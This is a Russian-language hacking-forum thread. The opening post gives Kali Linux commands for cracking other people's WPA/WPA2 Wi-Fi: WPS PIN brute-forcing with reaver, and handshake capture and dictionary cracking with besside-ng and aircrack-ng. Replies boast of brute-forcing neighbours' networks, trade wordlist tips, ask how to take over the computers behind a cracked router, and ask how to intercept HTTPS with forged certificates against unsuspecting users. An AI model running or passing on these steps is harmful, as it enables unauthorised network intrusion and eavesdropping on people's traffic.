Взлом Wi-Fi [WPA/WPA2]

Требуется:

Установленная Kali Linux.

Внешний wi-fi адаптер с возможностью monitor mode.

Открываем терминал:

airmon-ng start wlan0(wi-fi адаптер)

airodump-ng mon0

wash -i mon0 -C - получаем список Wi-Fi сетей с WPS.

reaver -b (bssid) -i wlan0 (interface) -vv -w

Ждём окончания подбора пина.

Вариант номер 2. Отключенный WPS.

airmon-ng start wlan0

airodump-ng mon0

besside-ng -b (bssid) mon0 (interface)

Далее проверяем файл besside.;og на наличие handshake.

Как только handshake захвачен продолажаем.

aircrаck-ng -w (путь к словарю) -0 (путь к wpa.cap)

Брутитить handshake возможно в любое время, в любом месте в оффлайн режиме.

Всем удачной охоты.

Plaguexe, вот я всегда удивлялся людям которые пишут про брут и что мол все просто ломается получаешь и брутишь. У меня вопрос у вас что супер мощные компы или как? Мне вот хотелось бы посмотреть как и сколько ты будешь брутить пароль 14 значный например. День два? И что у тебя есть словари со всеми всеми комбинациями? Я например качал словарики по 20 гигов и более и там почему то ни разу не находились те пароли которые используют мои соседи ит.п все поэтому брут на мой взляд обычная рулетка.

Реально я ломал и мои знакомые только сети с включенным wps остальные методы шлак

Терпения маловато и сообразительности наверное..

Мой бук перебирает 1600-1800 комбинаций в секунду. Откуда вы качаете 20 гигов шлака я не в курсе.

Скажи это моему toshiba quosmio x75 который с кудой жарит под 500-600 в секу.

Вижу умник нашелся давай погнал ... хочу я посмотреть как ты бы подбирал пароль sise4chknible ит.п а если вам лохи попадаются на фае с паролями типа qwerty1993 ит.п то нефиг пиздеть про смекалку

Ну понятно что это брут, так бывает. Уязвимостей в протоколе нет.. Жди их, тогда будет малина..

Вместо aircrack-а юзайте pyrit, если из форточки сидите то ewsa или hashcat, и желателно брутите на словарях с мобильными номерами и с датами рождениями, многие люди именно такие пассворды ставят, сам по опыту знаю

Брутил соседей какой-то прогой с андроида из набора Bugtroid PRO, нихуя не набрутил. Нашел в папках какой-то текстовый документ, похоже на словарь, там всего 2400 вариантов. Сколько оптимально?

Редактировался Man (2015-03-19 16 ч.)

вот тут читайте кому чето не понятно  habrahabr.ru/post/224955/

читать все 3 статьи, это самое информативное что я находил про взлоv, брут и прочее по WPA/WPA2

всего 2400 вариантов- это какбэ вообще нихуя не о чем, я брутил словарями и на 10 Гиг и тоже было не оптимально. Пароль или есть или нету в словарике, тут как говориться оптимала нету. Ты хоть смотрел что там за 2400 вариантов? Там может 1000 вариантов меньше 8знака пароли а WPA2 надо минимум словарики искать от 8 и до дохуя знаков. /Мой провайдер ставит по умолчанию 16значный цифровой пароль, ну и 16знак даже только цифирки, даже 2 самые мошные видюхи от ATI будут очень долго по словарику подбирать.

midZaru, базы хешей в помощь...
И вообще давайте пообсуждаем брут md5(как ключа к wifi) на графических кластерах amazon, там вроде линукс какой-то, и цены разные, если брутить за деньги по 50 паролей шансов что найдется больше(отобъется стоимость). Цены, спрос/предложение?

Подскажите, есть сеть WPA2, тип радио 802.11n. При подключении выдаёт "Введите учётные данные пользователя" и предлагает ввести логин и пароль. как такой wifi взломать?

Вопрос к ТС: Что можно сделать дальше?
Взломал я Wi-Fi, вижу всю сеть - роутер/AP, компы с виндой XP/7/8, мобильные/планшеты, хранилки. А есть ли алгоритм как всё это ломать? В идеале - полный доступ к компам.

И ещё такой вопрос... Есть такая фича в корпоративных проксях - HTTPS Inspection. Когда прокся вклинивается в HTTPS сессию и обманывает клиента, подменяя запрошеный сертификат своими. Можно ли такое в Kali сделать, и потом смотреть дешифрованный трафик. Расчёт, что пользователь ЛОХ и нажмёт "Да", когда его браузер заорёт на поддельный сертификат.

Алгоритм есть. Писать его не вижу большого желания. Т.к. многие считают мои посты бесполезными. Есть какие-то вопросы можешь написать мне лично в жабу или почту. [email protected]

Plaguexe, да ты не стесняйся, выкладывай на общее, всегда найдется недовольный.
Мне больше люба идея генерации словаря на лету, я брутом вафли никогда не занимался, с вебсервисами работает.

Почта почему-то не доходит. Возвращаются DSN ответы 550 5.7.1 No such user. Точно e-mail верный?

Просто это жаба. Почту вырезали из подписи со всеми контактами.

Влияет ли скорость процессора или видеокарты на скорость подбора PIN`а для WPS?

Конечно видеокарта. Radeon предпочтительнее.

У меня от этой хуйни брат умер